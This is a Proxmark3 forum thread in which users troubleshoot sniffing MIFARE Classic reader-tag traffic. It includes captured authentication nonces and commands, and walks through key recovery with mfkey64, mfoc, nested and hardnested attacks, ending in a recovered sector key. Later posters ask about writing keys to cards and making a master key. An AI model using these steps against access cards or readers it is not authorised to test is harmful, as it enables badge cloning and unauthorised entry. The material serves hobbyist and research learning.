Hello,
I had the opportunity to snoop MIFARE communication. I am looking for the key of my tag, but when I enter 'hf list 14a' I see only the tag UID and then just CRC!
My tag is MIFARE CLASSIC 1k | Plus 2k SL1, UID: bbbe991d. Is there an antenna error?
I think it's unlikely. Maybe the signal is too strong or weak. How can I sniff TAG and Reader communication?
Where am I making a mistake?
Perhaps someone is familiar with this and able to advise.
Thank you.
proxmark3> hw version
Prox/RFID mark3 RFID instrument
bootrom: /-suspect 2015-11-19 10:08:02
os: master/v3.0.1-71-g5c814c3-suspect 2017-08-23 21:35:43
LF FPGA image built for 2s30vq100 on 2015/03/06 at 07:38:04
HF FPGA image built for 2s30vq100 on 2017/07/13 at 08:44:13
uC: AT91SAM7S512 Rev B
Embedded Processor: ARM7TDMI
Nonvolatile Program Memory Size: 512K bytes. Used: 198383 bytes (38%). Free: 325905 bytes (62%).
Second Nonvolatile Program Memory Size: None
Internal SRAM Size: 64K bytes
Architecture Identifier: AT91SAM7Sxx Series
Nonvolatile Program Memory Type: Embedded Flash Memory
proxmark3> hf tune
#db# Measuring HF antenna, press button to exit
#db# 31727 mV
#db# 31727 mV
#db# 31727 mV
proxmark3> hf search
UID : bb be 99 1d
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
Answers to chinese magic backdoor commands: NO
Valid ISO14443A Tag Found - Quiting Search
proxmark3> hf 14a snoop
#db# COMMAND FINISHED
#db# maxDataLen=3, Uart.state=0, Uart.len=1
#db# traceLen=39293, Uart.output[0]=00000026
proxmark3> hf list 14a
Recorded Activity (TraceLen = 39293 bytes)
Start = Start of Start Bit, End = End of last modulation. Src = Source of Transfer
iso14443a - All times are in carrier periods (1/13.56Mhz)
iClass - Timings are not as accurate
Start | End | Src | Data (! denotes parity error) | CRC | Annotation |
------------|------------|-----|-----------------------------------------------------------------|-----|--------------------|
0 | 192 | Tag | 01 | |
115456 | 115648 | Tag | 01 | |
139200 | 139584 | Tag |00! | |
162368 | 164736 | Tag | 04 00 | |
187072 | 189440 | Tag | 04 00 | |
209104 | 210000 | Tag | 04 | |
255824 | 256464 | Tag | 04 | |
279952 | 280144 | Tag | 01 | |
...
7431216 | 7433584 | Tag | 04 00 | |
7449792 | 7452160 | Tag | 04 00 | |
7459904 | 7465152 | Tag | bb be 99 1d 01 | |
7490752 | 7493120 | Tag | 04 00 | |
7500864 | 7506688 | Tag | bb be 99 1d 81 | |
7522752 | 7526272 | Tag | 08 b6 dd | |
8923296 | 8927968 | Tag | 05 a9 bc 71 | |
8940960 | 8945632 | Tag |c6! a6 05 11 | |
8955424 | 8976224 | Tag |76! 08 49! c2 b3 43! a6 53! 41 6a! eb! 4f db e6! d0! 28! | |
| | |b9! 36 | !crc|
8992048 | 8996784 | Tag | 15 37! 5a ac! | |
9009712 | 9014384 | Tag |ac! a5 87! 86! | |
9023408 | 9044208 | Tag | 52 79! 1d e9 04! 64! 80! 25 15! e9 09! c1! 67 61! 34 45! | |
| | |4a! 58! | !crc|
9053872 | 9074736 | Tag | c3 50 12 1f! de! f0! 23 8b! 33! 75 01! 1a 05 6c 02! 90! | |
| | |e2! 44! | !crc|
9084336 | 9105200 | Tag | 69 e6 d7 ca aa 24! 69 64! 4e! bb b0! 82! 97 75 31! cc | |
| | |d7! df | !crc|
9123632 | 9128368 | Tag |28! 9b 83 f1 | |
9141296 | 9145968 | Tag |0c! 72! 45! 0b! | |
9154992 | 9175792 | Tag |26! 26! a4! a0 3a e4 9e! 1b! df e9 0d 1b 0a! 39 2c! 7a! | |
| | | 8c 8f! | !crc|
9192384 | 9197056 | Tag |ce! 0c! b2 bf! | |
9210048 | 9214720 | Tag |3b! 3d! 25! fe! | |
9224512 | 9245376 | Tag |81! 0f! ae a8 39 64 88 f2! d0! b8! 73! 8c! 66! 8b! c9 3b! | |
| | | 1b 77! | !crc|
9254976 | 9275840 | Tag | 65 76 19! ac! 3b! b8 c0! 9b ff! 49 21! f5 98 1f 09 3b! | |
| | |7f! 9f! | !crc|
9285440 | 9306304 | Tag |63! 60 d6 7a! 63! 47! 9d 2b! 43 bf! aa! 35! 5c! 50! a7 5a! | |
| | |2c! a5! | !crc|
9453264 | 9457936 | Tag | 4d fb! ab! dd | |
9470928 | 9475664 | Tag |57! 78! 98 d0 | |
9484624 | 9505488 | Tag |1a! f2 d3! d8 5e! f0! 2d 4e 7d! f2! 8c! 8a! 32! 2a! 60 52 | |
| | | 0b 31 | !crc|
9521232 | 9525968 | Tag | e3 7a! 1c! 16 | |
9538896 | 9543632 | Tag |2b! 2c 62! c1 | |
9552592 | 9573392 | Tag | cd 3e ae 15! 25! b4 88! 5c fa! da fc! 4f 26! ce! 87! 5d! | |
| | |ba! ea! | !crc|
9583056 | 9603920 | Tag |c9! 3b! 5d f3! e4! 62 bb! ec a3 d8! f0 12! 4a! 36 df fd! | |
| | | 55 a3! | !crc|
9613536 | 9634336 | Tag |8d! 2f 9b 13! 39! d4 e3 88 c4 35! 7d 6e! f8 8a! 52! 83 | |
| | |59! d1 | !crc|
9653344 | 9658080 | Tag |f6! 42 e9 dc | |
9671136 | 9675808 | Tag |f8! 1c! 06 2e | |
9685600 | 9706400 | Tag | 10 86! f9 f8! 29! f6 ae! 49! b2 61 7c! 1a a4! 16! cd! 0c! | |
| | |99! 7d | !crc|
15347328 | 15352064 | Tag |2e! fc! fa da | |
15364992 | 15369664 | Tag | 9a 1f e0! 55 | |
15378688 | 15399552 | Tag |83! 53! 76! 14 31! 88! 27! b6 43! 19 9c d6! a1! 42! 56! c1! | |
| | |84! 6f! | !crc|
15417088 | 15421760 | Tag |46! ff! 5e! 1e | |
15434752 | 15439424 | Tag | 46 1d! 25 15! | |
15449216 | 15470080 | Tag |35! f6! 20 4d e3 db! 29! d1! 25! f7! 35! 95! de! a3! 84! 43 | |
| | |e5! fe | !crc|
15486736 | 15491408 | Tag |d2! a8 92! 33 | |
15504400 | 15509136 | Tag |f3! 60 06! a1 | |
15518608 | 15539472 | Tag | d8 b9! e5! 02! f1! 4a d7 81 f0 6f! e2 4e 41! 35 b1 00! | |
| | |d5! 5c! | !crc|
15556112 | 15560848 | Tag |75! d4! 14! 91 | |
15573776 | 15578448 | Tag | c6 df! ee! 41 | |
15587472 | 15608272 | Tag |86! 13! ed! 0b! e3! b0! d4! fe c5! ac 3d! 00 99! f9! ba! b2! | |
| | |3f! f9 | !crc|
15624976 | 15629648 | Tag | 4d 85 98 d8 | |
15643536 | 15648208 | Tag |b7! 7b bb! 48 | |
15657232 | 15678032 | Tag | 6d ce! b5 e7! e4! af! 33! 80 ab! 93 3d 11! e0 c9 53! 15 | |
| | | 97 ff | !crc|
15694752 | 15699488 | Tag |0e! 28 70 92 | |
15712544 | 15717280 | Tag | be c6! 0c 7b! | |
15726240 | 15747040 | Tag |34! c1 a2 cd! 85 57! 20! 11 d8! ae! 2d! 63 63! 77! 42! 6b | |
| | | 2f 0b! | !crc|
15764640 | 15769376 | Tag |99! 03 19 4b! | |
15782304 | 15786976 | Tag |d9! 6d! 76 1e | |
15796000 | 15816800 | Tag |8a! 19! 25 5d! ef! 20 f1! 3b e3! 9d 60 ec 62 47 f3 a2! | |
| | | 5c 98! | !crc|
15834400 | 15839136 | Tag | 4f e4! 2c 4e! | |
15852064 | 15856736 | Tag | 35 b0 26 43! | |
15865760 | 15886624 | Tag | 8e 17! 54! 6e 30 0e a1! fb! f2! 25 0c a0 21! 5f ef ed! | |
| | |33! 09! | !crc|
15904176 | 15908912 | Tag |a2! 53! 54 95! | |
15921840 | 15926576 | Tag | f2 05! d8! ce | |
15935536 | 15956336 | Tag |0e! 23 a4 13! 83 e5 7d! 0a! 09! f4! bf! 46! cb 2f! 65 b2 | |
| | | e2 6c | !crc|
15973936 | 15978608 | Tag |b7! 25! 92! 3f | |
15991600 | 15996336 | Tag |0a! 32 aa! b8! | |
16006064 | 16026864 | Tag |17! da 64 ed 0b! 8a! 80! 53! 21! 5c cb 05 7f! 6a! d8 92! | |
| | |48! d5! | !crc|
16043568 | 16048304 | Tag |1a! 22 70 4e! | |
16061232 | 16065904 | Tag | 4b be! 67! ea! | |
16074928 | 16095728 | Tag | 0c 31 56 ec! 35! 99 0a 15 5d fc! ca! 77 79! 0c! 78 e8! | |
| | |23! 10!
Last edited by Tatka (2017-08-28 17:45:49)
Offline
Yes, your trace doesn't show the READER parts. Try different positions with your antenna.
You could try the sim command to try getting the key out of it. Read the help text for instructions, or here on the forum, search is your friend.
hf 14a sim h
Because you are trying to sniff/snoop a standard ISO14443a transaction, you will only get those parts out from your reader.
Mifare uses its own protocol above ISO14443a; luckily there is a mifare sniff command.
hf mf sniff
hf list 14a
Offline
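The check suggested in the reply above (does the capture contain reader frames at all?) can be automated. This is an added example, not part of the original thread and not Proxmark3 code: a small Python triage of `hf list 14a` rows, using rows copied from the traces quoted in this thread; the function names and result labels are assumptions made for the example.

```python
import re
from collections import Counter

ROW = re.compile(r"^\s*(\d+)\s*\|\s*(\d+)\s*\|\s*(Tag|Rdr)\s*\|([^|]*)\|")
CONT = re.compile(r"^\s*\|\s*\|\s*\|([^|]*)\|")  # wrapped data of the previous row
BYTE = re.compile(r"([0-9a-fA-F]{2})(!?)")       # '!' marks a parity error

# Rows copied from the 'hf 14a snoop' and 'hf 14a sim' traces in this thread.
SNOOP_TRACE = """\
7449792 | 7452160 | Tag | 04 00 | |
7459904 | 7465152 | Tag | bb be 99 1d 01 | |
7490752 | 7493120 | Tag | 04 00 | |
7500864 | 7506688 | Tag | bb be 99 1d 81 | |
7522752 | 7526272 | Tag | 08 b6 dd | |
8923296 | 8927968 | Tag | 05 a9 bc 71 | |
8940960 | 8945632 | Tag |c6! a6 05 11 | |
8955424 | 8976224 | Tag |76! 08 49! c2 b3 43! a6 53! 41 6a! eb! 4f db e6! d0! 28! | |
| | |b9! 36 | !crc|
"""
SIM_TRACE = """\
0 | 1056 | Rdr | 26 | | REQA
2228 | 4596 | Tag | 04 00 | |
"""

def crc_a(data: bytes) -> bytes:
    """ISO/IEC 14443-3 CRC_A (initial value 0x6363), returned low byte first."""
    crc = 0x6363
    for b in data:
        b ^= crc & 0xFF
        b ^= (b << 4) & 0xFF
        crc = (crc >> 8) ^ (b << 8) ^ (b << 3) ^ (b >> 4)
    return bytes([crc & 0xFF, crc >> 8])

def parse_trace(text: str) -> list:
    """Turn trace rows into frames, joining wrapped continuation rows."""
    frames = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            frames.append({"start": int(m[1]), "src": m[3],
                           "data": bytearray(), "parity_errors": 0})
            field = m[4]
        else:
            c = CONT.match(line)
            if not (c and frames):
                continue  # header, separator or unrelated line
            field = c[1]
        for hexbyte, bang in BYTE.findall(field):
            frames[-1]["data"].append(int(hexbyte, 16))
            frames[-1]["parity_errors"] += bool(bang)
    return frames

def classify(frame: dict) -> str:
    d = bytes(frame["data"])
    # MIFARE Classic encrypts parity bits together with the data, so frames
    # sent after authentication normally carry '!' marks; this is not by
    # itself a sign of a bad antenna or capture.
    if frame["parity_errors"]:
        return "parity-flagged"
    if len(d) == 5 and d[0] ^ d[1] ^ d[2] ^ d[3] == d[4]:
        return "uid+bcc ok"        # anticollision answer: UID plus check byte
    if len(d) >= 3 and crc_a(d[:-2]) == d[-2:]:
        return "crc_a ok"          # plaintext frame with a valid CRC_A
    return "unverified"

def triage(text: str) -> dict:
    frames = parse_trace(text)
    by_src = Counter(f["src"] for f in frames)
    return {
        "frames": len(frames),
        "reader_frames": by_src["Rdr"],
        "tag_frames": by_src["Tag"],
        "classes": Counter(classify(f) for f in frames),
        # A usable sniff needs both directions; one empty side means the
        # antenna position or coupling has to change.
        "one_sided": bool(frames) and (by_src["Rdr"] == 0 or by_src["Tag"] == 0),
    }

if __name__ == "__main__":
    for name, trace in (("snoop", SNOOP_TRACE), ("sim", SIM_TRACE)):
        print(name, triage(trace))
```

On the snoop rows this reports eight tag frames and no reader frames, which is the one-sided capture described in the reply; the two plaintext tag answers (UID with check byte, SAK with CRC_A) verify cleanly, so the tag side itself was received correctly.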
Hello. Thank you for your advice.
proxmark3> hf 14a sim 1 bbbe001d x
Emulating ISO/IEC 14443 type A tag with 4 byte UID (bbbe001d)
#db# 1000 commands later...
#db# 0 0 3e8
proxmark3> hf list 14a
Recorded Activity (TraceLen = 21000 bytes)
Start = Start of Start Bit, End = End of last modulation. Src = Source of Transfer
iso14443a - All times are in carrier periods (1/13.56Mhz)
iClass - Timings are not as accurate
Start | End | Src | Data (! denotes parity error) | CRC | Annotation |
------------|------------|-----|-----------------------------------------------------------------|-----|--------------------|
0 | 1056 | Rdr | 26 | | REQA
2228 | 4596 | Tag | 04 00 | |
11776 | 12832 | Rdr | 26 | | REQA
14004 | 16372 | Tag | 04 00 | |
22912 | 23968 | Rdr | 26
Worked but found no key. I was kicked right after the first two bytes. I used
hf mf sniff
And now I see this communication.
proxmark3> hf mf dbg 1
#db# Debug level: 1
proxmark3> hf mf sniff
-------------------------------------------------------------------------
Executing command.
Press the key on the proxmark3 device to abort both proxmark3 and client.
Press the key on pc keyboard to abort the client.
-------------------------------------------------------------------------
......................................>
received trace len: 17546 packages: 35
tag select uid:bb be 99 1d atqa:0x0004 sak:0x08
RDR(0):61 03 b6 50
TAG(1):6c cd eb b1
RDR(2):8e 8d 5a 92 66 bd 68 f9
TAG(3):cd 9f ac 2a
RDR(4):97 35 19 fd
TAG(5):34 93 34 80 34 c9 5f 98 b4 e2 5f af ea bb 67 5d 22 3f
RDR(6):f6 11 65 23
TAG(7):bf f1 0d 4b
RDR(8):9a 87 29 e9 12 81 66 b7
TAG(9):6b 1f 6c cb
RDR(10):21 5d 28 3b
TAG(11):cc fe 84 de 89 7f 3e 9a 08 87 0e 2e ac a4 49 72 24 d2
RDR(12):48 d5 f1 70
TAG(13):f5 e6 d7 07 a8 eb b4 b0 00 e6 b2 05 da a3 a9 99 9e 11
RDR(14):99 d7 5f 8d
TAG(15):91 d3 43 89 c7 ed 31 29 e5 b4 1c dc 62 be 9f 8b a9 3a
RDR(16):12 01 8a 6b
TAG(17):f6 92 02 19
RDR(18):a5 9a 2a 47 6e f4 7e e3
TAG(19):e3 7e 75 04
RDR(20):ab f4 e0 59
TAG(21):31 4c 0a 33 9b 12 d6 8c ae 8e e9 73 5d df 5e f2 7e 96
RDR(22):dd a8 5e 18
TAG(23):2d ac db 8e
RDR(24):89 e7 a7 84 6d 3b 89 0d
TAG(25):12 b5 49 ad
RDR(26):ac 1b c8 29
TAG(27):df 9e 8c e0 96 be a5 f7 75 00 4d 9d e8 8d 46 d0 77 6c
RDR(28):03 dd bf 7e
TAG(29):fb 00 00 22 53 ef 87 21 c1 72 04 7b 6d 85 b2 03 71 7b
RDR(30):52 8e e0 8e
TAG(31):b7 ac 19 6f 78 81 d0 1f d2 14 37 9d 9c 9f b9 49 5a c6
RDR(32):99 36 c9 15
TAG(33):1d e6 42 ba
RDR(34):32 9b 3a d5 6b 63 c4 db
TAG(35):98 18 ee 2c
RDR(36):38 c9 8b f4
TAG(37):50 2a ac 42 0d 7f 74 54 4a 1f 67 af 63 7b fa 5d 81 6c
RDR(38):6b 95 25 e3
TAG(39):ba 07 e9 57
RDR(40):e5 8d 94 05 01 7e a1 81
TAG(41):37 02 4c 25
RDR(42):16 77 fd 1b
TAG(43):84 7e a2 7f 1a 9e 2f 25 3a f3 f6 aa cf 66 3f 24 d5 1e
RDR(44):e3 0f 9d 32
TAG(45):a3 ba e7 86 88 35 f3 7d 42 15 08 23 25 46 e5 d1 30 27
RDR(46):b6 1c e5 17
TAG(47):77 6b 3a fa 15 e8 1d 98 a8 f4 54 df 5d a6 c6 db c2 f8
RDR(48):33 87 f1 7e
TAG(49):1e 2f 79 89
RDR(50):89 4c 87 78 eb a8 07 48
TAG(51):69 a7 7d 9f
RDR(52):bc c1 cf 30
TAG(53):4d b7 17 fe e1 56 54 f3 2f d8 e6 52 90 76 6c 69 7b 4a
RDR(54):bc 01 6a 74
TAG(55):3c 25 c5 d5
RDR(56):cd 0d c1 41 19 27 e8 cb
TAG(57):38 2f 34 23
RDR(58):54 36 8a 59
TAG(59):5b 35 6d c0 97 78 2e df b0 0e 87 1d 75 60 20 35 5c 03
RDR(60):a7 d7 58 8c
TAG(61):b6 6f 2d ab
RDR(62):3e 25 65 ea f7 28 c7 e0
TAG(63):5f c0 32 45
RDR(64):47 d3 3f e6
TAG(65):66 ed 44 b8 7f eb f5 49 9d 99 eb 00 22 b7 ba 8c df 82
RDR(66):85 42 ef 37
TAG(67):01 4c 58 8c
RDR(68):18 11 f0 62 f8 2e 81 3f
TAG(69):fd 3f 8e b0
...
The tag uses more keys and I'm trying to find the right ones. So far, I have found only one valid B key. It is only for sector zero, where the keys used are A=a0a1a2a3a4a5 or B=1bacd1f05468.
Other sectors are locked.
I use the parameters for Crypto1 as follows:
# ./mfkey64 bbbe991d 6ccdebb1 8e8d5a92 66bd68f9 cd9fac2a
MIFARE Classic key recovery - based on 64 bits of keystream
Recover key from only one complete authentication!
Recovering key for:
uid: bbbe991d
nt: 6ccdebb1
{nr}: 8e8d5a92
{ar}: 66bd68f9
{at}: cd9fac2a
LFSR successors of the tag challenge:
nt' : 149a0313
nt'': 3b6dbb00
Time spent in lfsr_recovery64(): 0.06 seconds
Keystream used to generate {ar} and {at}:
ks2: 72276bea
ks3: f6f2172a
Found Key: [1bacd1f05468]
1bacd1f05468 --> is valid for sector 0 as key B
# ./mfkey64 bbbe991d bff10d4b 9a8729e9 128166b7 6b1f6ccb
MIFARE Classic key recovery - based on 64 bits of keystream
Recover key from only one complete authentication!
Recovering key for:
uid: bbbe991d
nt: bff10d4b
{nr}: 9a8729e9
{ar}: 128166b7
{at}: 6b1f6ccb
LFSR successors of the tag challenge:
nt' : 81299d2f
nt'': f5689194
Time spent in lfsr_recovery64(): 0.07 seconds
Keystream used to generate {ar} and {at}:
ks2: 93a8fb98
ks3: 9e77fd5f
Found Key: [8d8d7e26d663]
8d8d7e26d663 is not valid for any sector.
...
Now I do not know how to continue to read sectors 1-15.
I tried 'mfoc' but the new keys were not found.
$ mfoc -k 1bacd1f05468 -k a0a1a2a3a4a5 -T 30 -P 500 -O dumpkeys.bin
The custom key 0x1bacd1f05468 has been added to the default keys
The custom key 0xa0a1a2a3a4a5 has been added to the default keys
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
* UID size: single
* bit frame anticollision supported
UID (NFCID1): bb be 99 1d
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092
Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
* SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:
Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: 1bacd1f05468] -> [\...............]
[Key: a0a1a2a3a4a5] -> [x...............]
[Key: ffffffffffff] -> [x...............]
[Key: a0a1a2a3a4a5] -> [x...............]
[Key: d3f7d3f7d3f7] -> [x...............]
[Key: 000000000000] -> [x...............]
[Key: b0b1b2b3b4b5] -> [x...............]
[Key: 4d3a99c351dd] -> [x...............]
[Key: 1a982c7e459a] -> [x...............]
[Key: aabbccddeeff] -> [x...............]
[Key: 714c5c886e97] -> [x...............]
[Key: 587ee5f9350f] -> [x...............]
[Key: a0478cc39091] -> [x...............]
[Key: 533cb6c723f6] -> [x...............]
[Key: 8fd0a4f256e9] -> [x...............]
Sector 00 - Found Key A: a0a1a2a3a4a5 Found Key B: 1bacd1f05468
Sector 01 - Unknown Key A Unknown Key B
Sector 02 - Unknown Key A Unknown Key B
Sector 03 - Unknown Key A Unknown Key B
Sector 04 - Unknown Key A Unknown Key B
Sector 05 - Unknown Key A Unknown Key B
Sector 06 - Unknown Key A Unknown Key B
Sector 07 - Unknown Key A Unknown Key B
Sector 08 - Unknown Key A Unknown Key B
Sector 09 - Unknown Key A Unknown Key B
Sector 10 - Unknown Key A Unknown Key B
Sector 11 - Unknown Key A Unknown Key B
Sector 12 - Unknown Key A Unknown Key B
Sector 13 - Unknown Key A Unknown Key B
Sector 14 - Unknown Key A Unknown Key B
Sector 15 - Unknown Key A Unknown Key B
Using sector 00 as an exploit sector
Card is not vulnerable to nested attack
$_
.
I'm a newbie and I have a lot to learn. There is no sky without clouds.
Last edited by Tatka (2017-08-28 00:05:00)
Offline
I also tried the 'nested':
proxmark3> hf mf nested 1 0 B 1bacd1f05468 d
Testing known keys. Sector count=16
nested...
-----------------------------------------------
Tag isn't vulnerable to Nested Attack (random numbers are not predictable).
What else can I do to crack the card?
Offline
Go and read up about hardnest and how it works.
btw if you are unsure about the commands please feel free to type half the command.
Example: hf mf chk - will give you
Usage: hf mf chk <block number>|<*card memory> <key type (A/B/?)> [t|d] [<key (12 hex symbols)>] [<dic (*.dic)>]
* - all sectors
card memory - 0 - MINI(320 bytes), 1 - 1K, 2 - 2K, 4 - 4K, <other> - 1K
d - write keys to binary file
t - write keys to emulator memory
sample: hf mf chk 0 A 1234567890ab keys.dic
hf mf chk *1 ? t
hf mf chk *1 ? d
hf mf hardnest - will give you
Usage:
hf mf hardnested <block number> <key A|B> <key (12 hex symbols)>
<target block number> <target key A|B> [known target key (12 hex symbols)] w s
or hf mf hardnested r [known target key]
Options:
w: Acquire nonces and write them to binary file nonces.bin
s: Slower acquisition (required by some non standard cards)
r: Read nonces.bin and start attack
sample1: hf mf hardnested 0 A FFFFFFFFFFFF 4 A
sample2: hf mf hardnested 0 A FFFFFFFFFFFF 4 A w
sample3: hf mf hardnested 0 A FFFFFFFFFFFF 4 A w s
sample4: hf mf hardnested r
Add the known target key to check if it is present in the remaining key space:
sample5: hf mf hardnested 0 A A0A1A2A3A4A5 4 A FFFFFFFFFFFF
Good that you are learning, keep practising.
Last edited by Dot.Com (2017-08-28 03:27:25)
Offline
It works great. It's amazing. It's like magic
pm3 --> hf mf hardnested 0 B 1bacd1f05468 4 A
--target block no: 4, target key type:A, known target key: 0x000000000000 (not set), file action: none, Slow: No, Tests: 0
time | #nonces | Activity | expected to brute force
| | | #states | time
------------------------------------------------------------------------------------------------------
0 | 0 | Start using 8 threads and AVX2 SIMD core | |
0 | 0 | Brute force benchmark: 1121 million (2^30.1) keys/s | 140737488355328 | 35h
1 | 0 | Using 235 precalculated bitflip state tables | 140737488355328 | 35h
5 | 112 | Apply bit flip properties | 363263426560 | 5min
6 | 224 | Apply bit flip properties | 112237199360 | 2min
7 | 335 | Apply bit flip properties | 88805146624 | 79s
8 | 447 | Apply bit flip properties | 76838215680 | 69s
8 | 559 | Apply bit flip properties | 76532318208 | 68s
9 | 669 | Apply bit flip properties | 74550116352 | 67s
10 | 779 | Apply bit flip properties | 74550116352 | 67s
11 | 889 | Apply bit flip properties | 74550116352 | 67s
11 | 997 | Apply bit flip properties | 74550116352 | 67s
12 | 1106 | Apply bit flip properties | 74550116352 | 67s
13 | 1215 | Apply bit flip properties | 74550116352 | 67s
14 | 1324 | Apply bit flip properties | 74550116352 | 67s
15 | 1434 | Apply bit flip properties | 74550116352 | 67s
16 | 1541 | Apply bit flip properties | 74550116352 | 67s
16 | 1649 | Apply bit flip properties | 74550116352 | 67s
18 | 1759 | Apply Sum property. Sum(a0) = 64 | 21144940544 | 19s
18 | 1864 | Apply bit flip properties | 7027675648 | 6s
19 | 1970 | Apply bit flip properties | 7027675648 | 6s
20 | 2080 | Apply bit flip properties | 7877309440 | 7s
21 | 2186 | Apply bit flip properties | 7027675648 | 6s
22 | 2295 | Apply bit flip properties | 5142730752 | 5s
23 | 2295 | (1. guess: Sum(a8) = 0) | 5142730752 | 5s
23 | 2295 | Apply Sum(a8) and all bytes bitflip properties | 4239027712 | 4s
23 | 2295 | Brute force phase completed. Key found: 0a65cb3eb977 | 0 | 0s
pm3 -->
Now I can play Proxmark again.
Thank you.
Offline
Impressive numbers!
8 threads and Brute force benchmark: 1121 million (2^30.1) keys/s
Offline
I was flashing a new firmware yesterday. I hope this number does not show any problem.
Offline
Hi, sorry to piggyback on the old thread... let me know if I should open a new thread.
Playing around with the hf mf sniff / hf 14a snoop functions, I encountered the following problems:
1) In the iceman v3.1.0 fork there is no 'hf mf sniff' command. Is the mf sniff combined into 'hf 14a sniff'?
pm3 --> hw version
[[[ Cached information ]]]
Proxmark3 RFID instrument
[ ARM ]
bootrom: iceman/master/ice_v3.1.0-787-g192aa9ab 2018-04-08 11:49:32
os: iceman/master/ice_v3.1.0-787-g192aa9ab 2018-04-08 11:49:37
[ FPGA ]
LF image built for 2s30vq100 on 2017/10/25 at 19:50:50
HF image built for 2s30vq100 on 2017/11/10 at 19:24:16
[ Hardware ]
--= uC: AT91SAM7S512 Rev B
--= Embedded Processor: ARM7TDMI
--= Nonvolatile Program Memory Size: 512K bytes, Used: 237727 bytes (45%) Free: 286561 bytes (55%)
--= Second Nonvolatile Program Memory Size: None
--= Internal SRAM Size: 64K bytes
--= Architecture Identifier: AT91SAM7Sxx Series
--= Nonvolatile Program Memory Type: Embedded Flash Memory
pm3 --> hf mf h
help This help
darkside Darkside attack. read parity error messages.
nested Nested attack. Test nested authentication
hardnested Nested attack for hardened Mifare cards
keybrute J_Run's 2nd phase of multiple sector nested authentication key recovery
nack Test for Mifare NACK bug
chk Check keys
fchk Check keys fast, targets all keys on card
decrypt [nt] [ar_enc] [at_enc] [data] - to decrypt snoop or trace
-----------
dbg Set default debug mode
rdbl Read MIFARE classic block
rdsc Read MIFARE classic sector
dump Dump MIFARE classic tag to binary file
restore Restore MIFARE classic binary file to BLANK tag
wrbl Write MIFARE classic block
setmod Set MIFARE Classic EV1 load modulation strength
-----------
sim Simulate MIFARE card
eclr Clear simulator memory block
eget Get simulator memory block
eset Set simulator memory block
eload Load from file emul dump
esave Save to file emul dump
ecfill Fill simulator memory with help of keys from simulator
ekeyprn Print keys from simulator memory
-----------
csetuid Set UID for magic Chinese card
csetblk Write block - Magic Chinese card
cgetblk Read block - Magic Chinese card
cgetsc Read sector - Magic Chinese card
cload Load dump into magic Chinese card
csave Save dump from magic Chinese card into file or emulator
ice collect Mifare Classic nonces to file
2) When I tried with the official firmware (v3.0.1):
2.1) hf 14a snoop captures TAG-only information (I was using the Android TagInfo app as the reader for convenience),
where the info can be retrieved with hf list 14a / hf list mf
2.2) when using hf mf sniff, no info is captured at all, while the Android app is able to retrieve the tag UID etc.
(position: Android phone <--1cm--> PM3 Easy <--1cm--> test tag (IC))
Should I try with the FDI reader at the lift, or is something wrong locally in my setup?
proxmark3> hw version
[[[ Cached information ]]]
Prox/RFID mark3 RFID instrument
bootrom: master/v3.0.1-361-ge069547-suspect 2018-04-03 11:12:28
os: master/v3.0.1-361-ge069547-suspect 2018-04-03 11:12:31
LF FPGA image built for 2s30vq100 on 2015/03/06 at 07:38:04
HF FPGA image built for 2s30vq100 on 2017/10/27 at 08:30:59
uC: AT91SAM7S512 Rev B
Embedded Processor: ARM7TDMI
Nonvolatile Program Memory Size: 512K bytes. Used: 199639 bytes (38%). Free: 324649 bytes (62%).
Second Nonvolatile Program Memory Size: None
Internal SRAM Size: 64K bytes
Architecture Identifier: AT91SAM7Sxx Series
Nonvolatile Program Memory Type: Embedded Flash Memory
proxmark3> hf mf h
help This help
dbg Set default debug mode
rdbl Read MIFARE classic block
rdsc Read MIFARE classic sector
dump Dump MIFARE classic tag to binary file
restore Restore MIFARE classic binary file to BLANK tag
wrbl Write MIFARE classic block
chk Test block keys
mifare Read parity error messages.
hardnested Nested attack for hardened Mifare cards
nested Test nested authentication
sniff Sniff card-reader communication
sim Simulate MIFARE card
eclr Clear simulator memory block
eget Get simulator memory block
eset Set simulator memory block
eload Load from file emul dump
esave Save to file emul dump
ecfill Fill simulator memory with help of keys from simulator
ekeyprn Print keys from simulator memory
cwipe Wipe magic Chinese card
csetuid Set UID for magic Chinese card
csetblk Write block - Magic Chinese card
cgetblk Read block - Magic Chinese card
cgetsc Read sector - Magic Chinese card
cload Load dump into magic Chinese card
csave Save dump from magic Chinese card into file or emulator
decrypt [nt] [ar_enc] [at_enc] [data] - to decrypt snoop or trace
proxmark3> hf mf dbg 3
#db# Debug level: 3
proxmark3> hf mf sniff
-------------------------------------------------------------------------
Executing command.
Press the key on the proxmark3 device to abort both proxmark3 and client.
Press the key on pc keyboard to abort the client.
-------------------------------------------------------------------------
.#db# ISO14443A Timeout set to 1060 (10ms)
.......#db# Canceled by button.
#db# COMMAND FINISHED.
#db# maxDataLen=2, Uart.state=0, Uart.len=0
Done.
proxmark3> hf list mf
Recorded Activity (TraceLen = 0 bytes)
Start = Start of Start Bit, End = End of last modulation. Src = Source of Transfer
iso14443a - All times are in carrier periods (1/13.56Mhz)
iClass - Timings are not as accurate
Start | End | Src | Data (! denotes parity error) | CRC | Annotation |
------------|------------|-----|-----------------------------------------------------------------|-----|--------------------|
proxmark3> hf list 14a
Recorded Activity (TraceLen = 0 bytes)
Start = Start of Start Bit, End = End of last modulation. Src = Source of Transfer
iso14443a - All times are in carrier periods (1/13.56Mhz)
iClass - Timings are not as accurate
Start | End | Src | Data (! denotes parity error) | CRC | Annotation |
------------|------------|-----|-----------------------------------------------------------------|-----|--------------------|
Offline
When I get the keys out of the reader and after that I used crypto 1. But how do you put the keys on a card after crypto 1 when I get keys out of the reader?
Offline
@mike don't hijack threads.
Offline
I can not get out with the proxmark3. I try to make a master key but I can not. I also try to get info from the reader but I can not. I am new to this and I am learning. Can someone help me with that and explain to me how? iceman, can you help me out, and what did you mean? I'm Dutch, my English is not so good.
Offline
